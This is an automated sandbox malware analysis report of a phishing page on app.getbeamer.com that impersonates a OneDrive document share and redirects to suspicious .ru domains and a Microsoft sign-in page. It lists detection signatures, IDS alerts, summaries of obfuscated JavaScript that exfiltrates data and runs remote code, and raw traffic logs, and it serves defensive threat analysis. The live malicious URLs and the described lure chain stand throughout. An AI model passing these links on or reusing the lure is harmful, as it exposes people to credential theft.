Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://app.getbeamer.com/onedrivesecure/en

Overview

General Information

Sample URL:https://app.getbeamer.com/onedrivesecure/en
Analysis ID:1596278
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Phishing site or detected (based on various text indicators)
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1920,i,13882613665604877731,13674078214184280319,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.getbeamer.com/onedrivesecure/en" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-21T22:14:53.826417+010020221121Exploit Kit Activity Detected192.168.2.1649748104.26.2.186443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://7aopff8hhi2robm5gdfgzr8tt8v2krcgoy6uuy3lmhpmq5udo24.deryposi.ru/jlbzlotbmpcuyqcqkqspwLmyrpiRYUVCXKKIKYORDVCPXIACJHOKPAvira URL Cloud: Label: malware

Phishing

barindex
Source: https://app.getbeamer.com/onedrivesecure/enJoe Sandbox AI: Page contains button: 'CLICK HERE TO VIEW PDF FILE' Source: '1.1.pages.csv'
Source: 0.10.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wxxi.deripaud.ru/n682ZHUO/?utm_source=beam... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of evading detection and potentially carrying out phishing or other malicious activities.
Source: 0.9.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wxxi.deripaud.ru/n682ZHUO/?utm_source=beam... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script attempts to disable common browser security features like the context menu and keyboard shortcuts, further suggesting suspicious behavior. Overall, this script demonstrates a high risk of malicious activity and should be treated with caution.
Source: 0.11.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wxxi.deripaud.ru/n682ZHUO/?utm_source=beam... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It uses the `turnstile.render()` function to render a form, and the `sMYFaonGUb()` and `QrGOsCkMyX()` functions handle the form submission. The `QrGOsCkMyX()` function collects user data, including a 'pagelink' value, and sends it to a suspicious domain ('7aOPff8HhI2RoBM5gDFGzR8tT8V2krcgOY6UuY3LMHpmQ5UDO24.deryposi.ru'). Additionally, it attempts to fetch and execute code from an obfuscated URL ('../uaXjuZS5VoR0Ia55zkv7FBumtUTuPNX60HN48'). These behaviors are highly indicative of malicious intent, and the script should be considered a high-risk threat.
Source: Chrome DOM: 1.1OCR Text: Create your own newsfeed What's new on One Drive Secure One Drive Secure newsfeed and changelog. o: January 21, 2025 NEW Stillwell Hansen Thermal Parts Search in this feed OneDrive (2) New PDF Documents: for Business New One Drive Secure feed by Document Name: 930WlCO-JAN-lNV 01938 aean-r Sender: Christine Stramaglia Organization: Stillwell Hansen Thermal Parts Sent on: Jan 21, 2025 CLICK HERETO VIEW PDF FILE
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: bb7b47fe-a3c1-4fc5-83c3-3446b235536deb597869-40e3-4c25-8025-fa31fc2a9b3c
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://wxxi.deripaud.ru/n682ZHUO/?utm_source=beamer&utm_medium=standalone&utm_campaign=Stillwell-Hansen-Thermal-Parts&utm_content=textlinkHTTP Parser: No favicon
Source: https://wxxi.deripaud.ru/n682ZHUO/?utm_source=beamer&utm_medium=standalone&utm_campaign=Stillwell-Hansen-Thermal-Parts&utm_content=textlinkHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638730909491549739.YmI3YjQ3ZmUtYTNjMS00ZmM1LTgzYzMtMzQ0NmIyMzU1MzZkZWI1OTc4NjktNDBlMy00YzI1LTgwMjUtZmEzMWZjMmE5YjNj&ui_locales=en-US&mkt=en-US&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszXkVKREpwT2o3dx5uujp5gZJvmOnV6Lc092Dq6pG1IJ-Qd16p5aCSnATrw0Z3opI6nYoHpjZT3touGNMfoA92L9NbGW9n-bV6rflqDA-oJugVWet2RsH6MvDXbWP3V4lhtwkJINUBzWKBZ4PiQc2gPNscePXSAijNZDIsTvX7FzyNWxEAxN1poKjNwq_6Tdh4FtsQun4Lp2Zr0JPyzMan6jxdc1j4I-OX-6397gOkFSVAdhSm67fKCfFdn5SuyUKfDm1Olvj6-z1snQIHkg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: global trafficTCP traffic: 192.168.2.16:49755 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: login.microsoftonline.com to https://www.office.com/login#
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.office.com to https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3a%2f%2fwww.office.com%2fv2%2fofficehome.all&response_mode=form_post&nonce=638730909491549739.ymi3yjq3zmutytnjms00zmm1ltgzyzmtmzq0nmiymzu1mzzkzwi1otc4njktndblmy00yzi1ltgwmjutzmezmwzjmme5yjnj&ui_locales=en-us&mkt=en-us&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&state=0uszxkvkrepwt2o3dx5uujp5gzjvmonv6lc092dq6pg1ij-qd16p5acsnatrw0z3opi6nyohpjzt3tougnmfoa92l9nbgw9n-bv6rflqda-ojugvwet2rsh6mvdxbwp3v4lhtwkjinubzwkbz4piqc2gpnscepxsaijnzdistvx7fzynwxeaxn1pokjnwq_6tdh4ftsqun4lp2zr0jpyzman6jxdc1j4i-ox-6397gokfsvadhsm67fkcffdn5suyukfdm1olvj6-z1snqihkg&x-client-sku=id_net8_0&x-client-ver=7.5.1.0
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:49748 -> 104.26.2.186:443
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /onedrivesecure/en HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /styles/styles.css?v=3 HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /styles/public.css?v=f2 HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /styles/highlight-js.css HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
